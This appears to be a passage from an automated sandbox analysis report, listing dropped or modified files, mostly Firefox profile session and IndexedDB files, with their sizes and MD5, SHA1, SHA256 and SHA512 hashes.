SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionCheckpoints.json
Filesize122B
MD599601438ae1349b653fcd00278943f90
SHA18958d05e9362f6f0f3b616f7bfd0aeb5d37967c9
SHA25672d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a
SHA512ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionCheckpoints.json
Filesize146B
MD565690c43c42921410ec8043e34f09079
SHA1362add4dbd0c978ae222a354a4e8d35563da14b4
SHA2567343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d
SHA512c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionCheckpoints.json.tmp
Filesize53B
MD5ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionCheckpoints.json.tmp
Filesize288B
MD5362985746d24dbb2b166089f30cd1bb7
SHA16520fc33381879a120165ede6a0f8aadf9013d3b
SHA256b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e
SHA5120e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionstore-backups\recovery.baklz4
Filesize4KB
MD5a13ad68c4b5ef88329b9fd9b971a0ffb
SHA10e8d8c6dedd49bf60540dc4032e943f95003c698
SHA256bbbc63ddcf6286db86d2e8c7aa15ca9d5c4af3a4b011d2f89a53b17db4323a46
SHA512706684c9c7aae53e75b0b992972a6f8cd591d34bdb3e8b659fbed98846f3fe5d3b8a952f60ac4354723f3297b223d946d7a31421e79d677da7c52bcb09f56458
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionstore.jsonlz4
Filesize9KB
MD5dfc0e575e7367dc5d5e8911840ae494d
SHA1440269ba1b6dda99778fd1c89ecd3d48e0e54858
SHA256fe459c2430265c7432d15bd744126191d4ed4ebee42935938ccd74b54dfa6001
SHA512512b07605c8c7282d5d463ac529034d837f1ef72c2c916606db882b55e3ea96f5c0547765628478d0cedc3fe6b5406c9b746c2f018c92d9434e8dd51df344db2
-
Filesize
4KB
MD58056745f053cb83d9d5752ce8270a88c
SHA1e44a6cca796ce51a6dda917f8c6bb36fb161b7d5
SHA2562fe4ea2695c46045a092f8b78995a5134fa66b4bc728789ea8c31164c2e71922
SHA512e3044515d53cb83448f45d9a96cb335c9e260bb099f71645201a28519846d7955d1efa23582c7ea3a70c35e0b973010520babc17a4e584ea224cc1e41fd02c3b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Filesize48KB
MD58460c3366376347be825f9477d9b4d2f
SHA11d6b0a2e38df48e04de2b0ef9745129073ea2194
SHA256f86b534a557f70e5ddd47388cf148bf833e66111ecc626728ac9a5b048f4a025
SHA512ac97241baebeb61bda48d0d919631e751fbb9936a70539fc8c8663856ec18ba2ccd294e2ba3ba462a100e63017eefd68b71128ae523711eea44130f8918d1852
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.5MB
MD5cdff99d6803d01d8f0ae35448532afd1
SHA1a4ae6b1a9d2cb5aa840ece0046a43b7af19207bd
SHA256d66c8d1dfbb8d4774d52715c75cd431d1a84dfa881b6da476306533bfae8a002
SHA5129527ec31f9151014b882235546a5bbf48765f519d41d028d02ed8c3d0041fda179d42cc85c07a157f2072b4d6a2a8557e27746eabbadf5f7a8a879eaf4715ad7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize1.8MB
MD52997cc63c93a9a04ed1811be35878d40
SHA17b18ade1a67ab7505985ce208ff80c0c693a837a
SHA2567ef74cfa9e69ff28970911df12a99ce4d9efa46ba3d5961ebc9a4dc90e035931
SHA51296a3aa40de2edffcc5a1bac5edf984b616cfbc1c196afd05e3f32234186d510a5980b5b3b162b3098b9eb9490dcbaec744311170b3df75386a1aacca22266262
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.3MB
MD50cde33733d6ba0cdc680d2b7ddf2cf1c
SHA1ef72b9117d93446b1d3d71f7460d400eb6bdb221
SHA25668b27ce562f1f935b30963d10a020175faeee3b859759ee0ea644fe9dd6059e8
SHA5126ee383c9a19cce10ffa98bf48d109dd6819a92dba9493c513ffb6e93c9750b5a6e2ea4c6d9b22a246acb46660430c3a2b92b580dbd985c36c74c36b94ed6b3f0
-
Filesize
141B
MD5b86e4804a994edbc0d2f7a339ff573b4
SHA160128734cda6b8ddb1705fef6062ff4b48e16aa7
SHA2568d975a3f6f200e22b7e1c125b1b235ca313a44ca2d070f9f52e79bf4bcea6292
SHA512286d2b9d2e5fed294fcb99c010d42d2d2b5bc6ddda0c46ec7a8650cfe372681c1148a56826c2985ebbd421dfd1cd23010848adaa232cf3cff00faf9806f6dff7
-
Filesize
1.4MB
MD5473eca3ac6347266138667622d78ea18
SHA182c5eec858e837d89094ce0025040c9db254fbc1
SHA256fb6e7c535103161ad907f9ce892ca0f33bd07e4e49c21834c3880212dbd5e053
SHA512bdc09be57edcca7bf232047af683f14b82da1a1c30f8ff5fdd08102c67cdbb728dd7d006de6c1448fdcdc11d4bb917bb78551d2a913fd012aeed0f389233dddf
-
Filesize
18KB
MD5e366fda31628c5d9da83cfcdb7ac9fc4
SHA1b0d01827d1fd9bd70ed3c60205e95baba728515b
SHA256043bc5f8da479077084c4ec75e5c1182254366d135373059906bb6fed0bf5148
SHA512e530b458bd94eeffa5aa8a2f8a27c7d6c1562c7ae8c955172ee3fd1e2ff88b2cfb94bebf10d56c3aa912b83f69fb2ff9d965c45706bc7050dd9837db1926358d
-
Filesize
5KB
MD5fe537a3346590c04d81d357e3c4be6e8
SHA1b1285f1d8618292e17e490857d1bdf0a79104837
SHA256bbc572cced7c94d63a7208f4aba4ed20d1350bef153b099035a86c95c8d96d4a
SHA51250a5c1ad99ee9f3a540cb30e87ebfdf7561f0a0ee35b3d06c394fa2bad06ca6088a04848ddcb25f449b3c98b89a91d1ba5859f1ed6737119b606968be250c8ce
-
Filesize
50KB
MD547abd68080eee0ea1b95ae31968a3069
SHA1ffbdf4b2224b92bd78779a7c5ac366ccb007c14d
SHA256b5fc4fd50e4ba69f0c8c8e5c402813c107c605cab659960ac31b3c8356c4e0ec
SHA512c9dfabffe582b29e810db8866f8997af1bd3339fa30e79575377bde970fcad3e3b6e9036b3a88d0c5f4fa3545eea8904d9faabf00142d5775ea5508adcd4dc0a
-
Filesize
16KB
MD50231c3a7d92ead1bad77819d5bda939d
SHA1683523ae4b60ac43d62cac5dad05fd8b5b8b8ae0
SHA256da1798c0a49b991fbda674f02007b0a3be4703e2b07ee540539db7e5bf983278
SHA512e34af2a1bd8f17ddc994671db37b29728e933e62eded7aff93ab0194a813103cad9dba522388f9f67ba839196fb6ed54ce87e1bebcfd98957feb40b726a7e0c6
-
Filesize
424KB
MD53402af12de0454b4480371e4c486ae59
SHA14a851c37b1f4cb5a779c36ea39e9c1d56b81f80c
SHA256e6f12248cc37747dc6b55ef94545fe4983398f48f9a03b8813394254ecaaddb3
SHA512da32d0aa252e34bb54246f772c592e0207b7fb86fb408315f4456451d4e2a22b419fd1b03a98591953f844e9db5127d72086873c1e8abeeab0f13fcbfb400b58
-
Filesize
32KB
MD570f549ae7fafc425a4c5447293f04fdb
SHA1af4b0ed0e0212aced62d40b24ad6861dbfd67b61
SHA25696425ae53a5517b9f47e30f6b41fdc883831039e1faba02fe28b2d5f3efcdc29
SHA5123f83e9e6d5bc080fb5c797617078aff9bc66efcd2ffac091a97255911c64995a2d83b5e93296f7a57ff3713d92952b30a06fc38cd574c5fe58f008593040b7f0
-
Filesize
68KB
MD5bc1e7d033a999c4fd006109c24599f4d
SHA1b927f0fc4a4232a023312198b33272e1a6d79cec
SHA25613adae722719839af8102f98730f3af1c5a56b58069bfce8995acd2123628401
SHA512f5d9b8c1fd9239894ec9c075542bff0bcef79871f31038e627ae257b8c1db9070f4d124448a78e60ccc8bc12f138102a54825e9d7647cd34832984c7c24a6276
-
Filesize
84KB
MD5b6e148ee1a2a3b460dd2a0adbf1dd39c
SHA1ec0efbe8fd2fa5300164e9e4eded0d40da549c60
SHA256dc31e710277eac1b125de6f4626765a2684d992147691a33964e368e5f269cba
SHA5124b8c62ddfc7cd3e5ce1f8b5a1ba4a611ab1bfccf81d80cf2cfc831cffa1d7a4b6da0494616a53b419168bc3a324b57382d4a6186af083de6fc93d144c4503741
-
Filesize
36KB
MD5d68cf4cb734bfad7982c692d51f9d156
SHA1fe0a234405008cac811be744783a5211129faffa
SHA25654143b9cd7aaf5ab164822bb905a69f88c5b54a88b48cc93114283d651edf6a9
SHA512eb25366c4bbe09059040dd17ab78914ff20301a8cd283d7d550e974c423b8633d095d8a2778cfb71352d6cb005af737483b0f7e2f728c2874dc7bdcf77e0d589
-
Filesize
212KB
MD5c26203af4b3e9c81a9e634178b603601
SHA15e41cbc4d7a1afdf05f441086c2caf45a44bac9e
SHA2567b8fc6e62ef39770587a056af9709cb38f052aad5d815f808346494b7a3d00c5
SHA512bb5aeb995d7b9b2b532812be0da4644db5f3d22635c37d7154ba39691f3561da574597618e7359b9a45b3bb906ec0b8b0104cbc05689455c952e995759e188b6
-
Filesize
9KB
MD5900ebff3e658825f828ab95b30fad2e7
SHA17451f9aee3c4abc6ea6710dc83c3239a7c07173b
SHA256caec6e664b3cff5717dd2efea8dcd8715abdcfe7f611456be7009771f22a8f50
SHA512e325f3511722eee0658cfcf4ce30806279de322a22a89129a8883a630388ab326955923fa6228946440894bd2ef56d3e6dfda3973ea16cc6e463d058dd6e25ce
-
Filesize
44KB
MD5a13a4db860d743a088ef7ab9bacb4dda
SHA18461cdeef23b6357468a7fb6e118b59273ed528c
SHA25669ee59cee5a1d39739d935701cfa917f75787b29e0b9bda9ada9e2642ade434c
SHA51252909b5fcbf00ef4025f6051ee1b8a933fc2a0bd7a292fe25fac708f358e7c96d6d31ba263d07128d56bc614fcbd053b2fa1249024a8138baf30da8ac5f54806
-
Filesize
100KB
MD5b0feccddd78039aed7f1d68dae4d73d3
SHA18fcffb3ae7af33b9b83af4c5acbb044f888eeabf
SHA2565714efd4746f7796bbc52a272f8e354f67edfb50129d5fdaa1396e920956d0d6
SHA512b02b9476eeb9c43fcfef56949f867c1c88f152d65f3961a2838b8bff02df2383945aefb9a8c517ac78d79b5a9163c7677f5b6238f4624b1966994c9c09eb428d
-
Filesize
232KB
MD560fabd1a2509b59831876d5e2aa71a6b
SHA18b91f3c4f721cb04cc4974fc91056f397ae78faa
SHA2561dacdc296fd6ef6ba817b184cce9901901c47c01d849adfa4222bfabfed61838
SHA5123e842a7d47b32942adb936cae13293eddf1a6b860abcfe7422d0fb73098264cc95656b5c6d9980fad1bf8b5c277cd846c26acaba1bef441582caf34eb1e5295a
-
Filesize
10KB
MD58e2c097ca623ca32723d57968b9d2525
SHA1dccfb092fa979fb51c8c8ca64368a6f43349e41d
SHA256556700ac50ffa845e5de853498242ee5abb288eb5b8ae1ae12bfdb5746e3b7b1
SHA512a468476a8463c36c2db914e3fe4dc7aee67ac35e5e39292107431d68ab1553ca3c74255a741432ba71e8a650cf19eb55d43983363bfc9710e65b212fba37bbde
-
Filesize
13KB
MD5f22ae972aee081ec86faa30e73d9675f
SHA1a559057e10f7e524688043ca283e2380739d6744
SHA256166865fdb90e7964e7ea57a282343026d878230215e5694145f88a8afb56132f
SHA51280c000c1ee73a402d0960ee768272096541786eacda7b938f9791ca3da067f5838c6850c74dff466cccde11851989062328b4a3d87b2eb99a6cac0efcf45f4c1
-
Filesize
300KB
MD5f52fbb02ac0666cae74fc389b1844e98
SHA1f7721d590770e2076e64f148a4ba1241404996b8
SHA256a885b1f5377c2a1cead4e2d7261fab6199f83610ffdd35d20c653d52279d4683
SHA51278b4bf4d048bda5e4e109d4dd9dafaa250eac1c5a3558c2faecf88ef0ee5dd4f2c82a791756e2f5aa42f7890efcc0c420156308689a27e0ad9fb90156b8dc1c0
-
Filesize
128KB
MD57bd8a009b84b35868613332fe14267ab
SHA1d36d4753aab27c6c5e253b9926406f7f97dc69a6
SHA25656511f0b28f28c23b5a1a3c7d524ee25a4c6df9ac2b53797c95199534f86bbd2
SHA512ad8e121f601f6698d720181d486da828781f729ca7880fb35c6fc70f021197e4a508dc46d980108a168ef2c6c89a62f3140e676ff71a1e40ea3e397ad0c63261
-
Filesize
22KB
MD553df39092394741514bc050f3d6a06a9
SHA1f91a4d7ac276b8e8b7ae41c22587c89a39ddcea5
SHA256fff0ccf5feaf5d46b295f770ad398b6d572909b00e2b8bcd1b1c286c70cd9151
SHA5129792017109cf6ffc783e67be2a4361aa2c0792a359718434fec53e83feed6a9a2f0f331e9951f798e7fb89421fdc1ac0e083527c3d3b6dd71b7fdd90836023a0
-
Filesize
72KB
MD5da9dba70de70dc43d6535f2975cec68d
SHA1f8deb4673dff2a825932d24451cc0a385328b7a4
SHA25629ceeb3d763d307a0dd7068fa1b2009f2b0d85ca6d2aa5867b12c595ba96762a
SHA51248bbacb953f0ffbe498767593599285ea27205a21f6ec810437952b0e8d4007a71693d34c8fc803950a5454738bea3b0bafa9ff08cd752bf57e14fedf4efb518
-
Filesize
7KB
MD5d0730485eb604c3dcab2616b60334cbb
SHA10f6295ec853e9791b80d919a893b5babf097c38f
SHA2568e0a57a865e4850d0e92ef673f10efca6281b7fb75522e1e60c99056d3ce2c82
SHA5125e2bf776e87b5662f2640db4572f03fc0b226ce7726c586cc351b33479422cbef5f9abb2d1a19c8212e30370819ee77c287c91d39863c204a1ec4fcb470ea01e
-
Filesize
2.8MB
MD51535aa21451192109b86be9bcc7c4345
SHA11af211c686c4d4bf0239ed6620358a19691cf88c
SHA2564641af6a0071e11e13ad3b1cd950e01300542c2b9efb6ae92ffecedde974a4a6
SHA5121762b29f7b26911a7e6d244454eac7268235e2e0c27cd2ca639b8acdde2528c9ddf202ed59ca3155ee1d6ad3deba559a6eaf4ed74624c68688761e3e404e54da
-
Filesize
10.0MB
MD55df0cf8b8aa7e56884f71da3720fb2c6
SHA10610e911ade5d666a45b41f771903170af58a05a
SHA256dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360
SHA512724ce5e285c0ec68464c39292be62b80124909e98a6f1cd4a8ddee9de24b9583112012200bf10261354de478d77a5844cb843673235db3f704a307976164669a
-
Filesize
183KB
MD53d4e3f149f3d0cdfe76bf8b235742c97
SHA10e0e34b5fd8c15547ca98027e49b1dcf37146d95
SHA256b15c7cf9097195fb5426d4028fd2f6352325400beb1e32431395393910e0b10a
SHA5128c9d2a506135431adcfd35446b69b20fe12f39c0694f1464c534a6bf01ebc5f815c948783508e06b14ff4cc33f44e220122bf2a42d2e97afa646b714a88addff
-
Filesize
225KB
MD56520d9ab650c992b25c6467324baa2b2
SHA10a1f8a830228eb8f6229fed60b1171b2cdbfa5c1
SHA2561100b197992c499e5ae8d484ab83ef06e20e46d4f74847e2f838c98ee1c0caeb
SHA5122d8be4db599f735869fc5e9f0357fb5559e828c551399eeee7b9530850bd23577d27d0554e13ceb43ed3c9e7eb933e5509c2bee8408407f01f966e6ca858609b
-
Filesize
127B
MD5ea3152149600326656e1f74ed207df9e
SHA1361f17db9603f8d05948d633fd79271e0d780017
SHA256f895f54a7397294132ebe13da0cf48f00028f5ccc81eac77eecafdec858e7816
SHA5125f79b3295a6a2c4b5c5720e26741ae5da2008165bcde01472e19362f7ffd4edabaea348bb99c2850871045cfb07fb0e51e6c3db7b2e278732a9f15f5b34f1a52
-
Filesize
4KB
MD5abf47d44b6b5cd8701fdbd22e6bed243
SHA1777c06411348954e6902d0c894bdac93d59208da
SHA2564bc6059764441036962b0c0ec459b8ec4bb78a693a59964d8b79f0dc788a0754
SHA5129dcadf596cc6e5175f48463652f8b7274cd4b69aaf7b9123aa90adc17156868fce86b781c291315a9e5b72c94965242b5796d771b1b12c81d055b39bf305ac77
-
Filesize
84B
MD56a5f5a48072a1adae96d2bd88848dcff
SHA1b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c